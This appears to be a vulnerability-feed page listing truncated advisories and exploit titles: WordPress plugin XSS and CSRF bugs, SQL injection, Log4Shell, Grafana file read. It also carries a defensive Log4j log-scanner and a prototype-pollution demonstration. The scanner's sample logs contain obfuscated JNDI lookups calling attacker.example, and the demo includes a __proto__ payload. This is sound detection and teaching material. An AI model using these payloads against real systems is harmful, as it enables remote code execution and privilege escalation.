Learning Courses < 5.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Email PDT identity token settings, which could allow high-privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is...
4.8CVSS
0.6AI Score
0.001EPSS
Learning Courses < 5.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Email PDT identity token settings, which could allow high-privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. PoC: visit the PayPal setting under the Learning plugin and enter the XSS payload (">) in Ema...
4.8CVSS
2.2AI Score
0.001EPSS
https://www.sourcecodester.com/ Online Enrollment Management System in PHP and PayPal Free Source Code 1.0 is affected by: Incorrect Access Control. The impact is: gain privileges...
6.5CVSS
0.001EPSS
Apache APISIX Authorization Issue Vulnerability
Apache APISIX is a cloud-native microservices API gateway from the Apache Software Foundation. It is built on OpenResty and etcd, supports dynamic routing and hot-loading of plugins, and is suited to API management in microservice systems. An authorization issue...
9.8CVSS
2.9AI Score
0.972EPSS
The 5 Most-Wanted Threatpost Stories of 2021
As 2021 draws to a close, and the COVID-19 pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site). While 2020 was all about...
10CVSS
0.976EPSS
Exploit for Path Traversal in Apache Http Server
Vulnerability name: Apache remote code execution (CVE-2021-42013). Vulnerability description: Apache HTTP...
9.8CVSS
9.2AI Score
0.974EPSS
Exploit for Expression Language Injection in Apache Log4J
Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j...
9.4AI Score
How and why do we attack our own Anti-Spam?
We often use machine-learning (ML) technologies to improve the quality of cybersecurity systems. But machine-learning models can be susceptible to attacks that aim to "fool" them into delivering erroneous results. This can lead to significant damage to both our company and our clients. Therefore,.....
0.1AI Score
Heart to Heart OA2021 Winter Snow Edition has a logic flaw vulnerability
Heart OA is developed on a SaaS architecture using the cloud-computing model, to meet the construction needs of government cloud, industrial cloud, education cloud and other intelligent cloud platforms. Heart OA2021 Winter Snow Edition has a logic flaw; an attacker can use the...
1.6AI Score
Exploit for Path Traversal in Grafana
CVE-2021-43798 Grafana arbitrary file read. 1. Installation ```shell...
7.5CVSS
2.2AI Score
0.975EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
log4j-Scan-Burpsuite: a Burp Suite detection plugin for the Log4j vulnerability (CVE-2021-44228)...
9.1AI Score
Apache Log4j allows insecure JNDI lookups
Overview: Apache Log4j allows insecure JNDI lookups that could allow an unauthenticated, remote attacker to execute arbitrary code with the privileges of the vulnerable Java application using Log4j. CISA has published Apache Log4j Vulnerability Guidance and provides a Software List. Description: The...
10CVSS
10AI Score
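The lookup mechanism behind the CISA overview above is what makes naive string matching for "${jndi:" unreliable: Log4j 2 evaluates nested lookups such as ${lower:j} and the ${name:-default} form before the outer lookup runs, so a probe can spell "jndi" one character at a time. The scanner below is an added example, not CISA's or the Log4j project's code. It resolves only the lower, upper and default-value lookups (real Log4j also supports env, sys, date and others, so it is a detection aid rather than a complete interpolator), and the log lines, hostnames and addresses are constructed.

```javascript
// Added example (not CISA's or Apache Log4j's code): a small log scanner that
// understands the Log4j 2 lookup syntax well enough to catch obfuscated
// "${jndi:...}" probes. Only ${lower:x}, ${upper:x} and the ${name:-default}
// default-value form are resolved; everything else is left untouched.

// Resolve a single innermost lookup body (the text between "${" and "}").
// Returns null when this scanner cannot evaluate it, leaving it in place.
function resolveLookup(expr) {
  let body = expr;
  let fallback = null;
  const defaultPos = expr.indexOf(':-');       // Log4j default-value separator
  if (defaultPos !== -1) {
    body = expr.slice(0, defaultPos);
    fallback = expr.slice(defaultPos + 2);
  }
  const colon = body.indexOf(':');
  const prefix = colon === -1 ? '' : body.slice(0, colon).toLowerCase();
  const key = colon === -1 ? body : body.slice(colon + 1);
  switch (prefix) {
    case 'lower': return key.toLowerCase();
    case 'upper': return key.toUpperCase();
    default:
      // "${::-j}" or "${env:UNSET:-j}": an unresolvable lookup yields its default,
      // or null when it has none (e.g. "${jndi:...}" or "${version}").
      return fallback;
  }
}

// Repeatedly rewrite innermost lookups until nothing changes. The regex matches
// only bodies without a nested "${" or "}", so inner lookups resolve first and
// every rewrite removes one pair of braces, which guarantees termination.
function normalize(text) {
  let prev;
  let cur = text;
  do {
    prev = cur;
    cur = cur.replace(/\$\{([^${}]*)\}/g, (match, expr) => {
      const resolved = resolveLookup(expr);
      return resolved === null ? match : resolved;
    });
  } while (cur !== prev);
  return cur;
}

// Log4j lowercases the lookup prefix, so match "jndi" case-insensitively.
const JNDI_LOOKUP = /\$\{jndi:/i;

function isLog4ShellProbe(line) {
  return JNDI_LOOKUP.test(normalize(line));
}

// Scan an array of log lines; report 1-based line numbers with the de-obfuscated form.
function findLog4ShellProbes(lines) {
  const hits = [];
  lines.forEach((line, i) => {
    const normalized = normalize(line);
    if (JNDI_LOOKUP.test(normalized)) hits.push({ line: i + 1, normalized });
  });
  return hits;
}

// Constructed access-log lines (addresses and hostnames are made up).
const SAMPLE_LOG = [
  '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
  '10.0.0.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
  '10.0.0.8 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:L}dap://attacker.example/b} HTTP/1.1" 400 "-" "curl/7.79"',
  '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
  '10.0.0.6 - - [10/Dec/2021:10:00:05 +0000] "GET /docs/${version} HTTP/1.1" 404 "-" "Mozilla/5.0"',
];

console.log(findLog4ShellProbes(SAMPLE_LOG).map(h => `line ${h.line}: ${h.normalized}`).join('\n'));
```

Lines 2, 3 and 4 of the sample are reported; line 5 contains a lookup-shaped string that is not a JNDI lookup and is left alone. Because the scanner normalizes before matching, the report shows the payload as Log4j would have evaluated it, which is the form worth blocking at a WAF or hunting for across other logs.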
[For IT administrators] Please review how to respond to the Active Directory security hardening
The security updates released from November 2021 onward include, in order to resolve vulnerabilities, 4... in Active Directory
1.3AI Score
Exploit for Improper Input Validation in Microsoft
noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 ...
8.4AI Score
Exploit for Deserialization of Untrusted Data in Apache Log4J
CVE-2021-4428 reproduction. This demo targets Log4j2...
10CVSS
10AI Score
0.976EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
Log4Shell reproduction environment. Example notes: victim machine IP 47.47.47.47, attacker machine IP 48.48.48.48...
10CVSS
10AI Score
0.976EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
Log4j-check: supports the RC1 bypass. log4J...
8.9AI Score
Exploit for Incorrect Authorization in Apache Druid
CVE-2021-36749 Apache Druid LoadData arbitrary file read vulnerability. Code...
6.5CVSS
6.9AI Score
0.76EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
CVE-2021-44228-Demo: exploits CVE-2021-44228 via RMI and LDAP...
10CVSS
10AI Score
0.976EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
0x01 Environment: JDK 7u21 (any version will do). Affected versions: Apache Log4j 2.x <= 2.14.1...
10CVSS
10AI Score
0.976EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
This tool is intended only for enterprises to test for the vulnerability; using it to attack others is strictly prohibited...
9AI Score
Prototype pollution in paypal-adaptive
paypal-adaptive through 0.4.2 is vulnerable to Prototype Pollution through manipulation of JavaScript objects. The PayPal function could be tricked into adding or modifying properties of Object.prototype using a __proto__ ...
5.3CVSS
5.5AI Score
0.001EPSS
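The paypal-adaptive entry above describes the mechanism but not how a merge routine ends up writing to Object.prototype. The block below is an added example, not paypal-adaptive's code: a recursive options-merge helper of the kind that produces Prototype Pollution, beside a hardened version, run against a constructed JSON body that carries a "__proto__" key next to a legitimate option. The option name currencyCode and the isAdmin property are assumptions chosen for the demonstration.

```javascript
// Added example (not paypal-adaptive's code): a recursive options-merge helper
// of the kind that produces Prototype Pollution, beside a hardened version.
// The attacker-controlled JSON body below is constructed for the demonstration.

// Vulnerable: copies every enumerable key of `source` into `target`. A key
// named "__proto__" makes `target[key]` resolve to Object.prototype, so the
// recursion writes the attacker's values onto the prototype of every object.
function mergeVulnerable(target, source) {
  for (const key in source) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      mergeVulnerable(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Keys that would let a merge walk into the prototype chain. JSON.parse
// creates "__proto__" as an ordinary own property, so Object.keys() alone
// does not filter it out; the deny list does.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function mergeSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      // Only descend into a value the target itself owns, never an inherited one.
      const own = Object.prototype.hasOwnProperty.call(target, key) ? target[key] : undefined;
      const child = own !== null && typeof own === 'object' ? own : {};
      target[key] = mergeSafe(child, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Run both merges against the same payload and report what a fresh, unrelated
// object inherits afterwards.
function demo() {
  // Constructed request body: a legitimate option plus a "__proto__" key.
  const payload = JSON.parse('{"currencyCode":"USD","__proto__":{"isAdmin":true}}');

  const before = {}.isAdmin;                 // undefined: Object.prototype is clean
  mergeVulnerable({}, payload);
  const afterVulnerable = {}.isAdmin;        // true: every object now reports isAdmin
  delete Object.prototype.isAdmin;           // undo the pollution before continuing

  mergeSafe({}, payload);
  const afterSafe = {}.isAdmin;              // undefined: the hardened merge skipped __proto__

  return { before, afterVulnerable, afterSafe };
}

console.log(demo());
```

The deny list is the fix that matters for this bug class; Object.freeze(Object.prototype) at process start is a complementary defence that turns any remaining pollution path into a no-op (or a TypeError in strict mode) rather than a silent privilege change.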
Exploit for Deserialization of Untrusted Data in Apache Log4J
CVE-2021-44228 Remote Code Injection In Log4j...
10CVSS
10AI Score
0.976EPSS
Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF
The plugin does not have a CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged-in admin delete arbitrary posts from the...
6.5CVSS
2.9AI Score
0.001EPSS
Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF
The plugin does not have a CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged-in admin delete arbitrary posts from the blog. PoC...
6.5CVSS
3.1AI Score
0.001EPSS
PayPal Free Source Code SQL injection vulnerability
PayPal Free Source Code is an online registration management system. A security vulnerability exists in the PayPal Free Source Code 1.0 online registration management system that allows attackers to obtain sensitive information and execute arbitrary SQL commands via the IDNO...
7.2CVSS
6.4AI Score
0.002EPSS
Malicious npm Code Packages Built for Hijacking Discord Servers
A series of malicious packages in the Node.js package manager (npm) code repository are looking to harvest Discord tokens, which can be used to take over unsuspecting users’ accounts and servers. The npm repository is an open-source home for JavaScript developers to share and reuse code blocks....
-0.5AI Score
Exploit for Path Traversal in Grafana
Grafana-File-Read: Grafana unauthenticated file read. Affected versions: 8.0.0-latest ...
7.5CVSS
-0.4AI Score
0.975EPSS
An authenticated blind and error-based SQL injection vulnerability was discovered in Online Enrollment Management System in PHP and PayPal Free Source Code 1.0 that allows attackers to obtain sensitive information and execute arbitrary SQL commands via IDNO...
7.2CVSS
7.4AI Score
0.002EPSS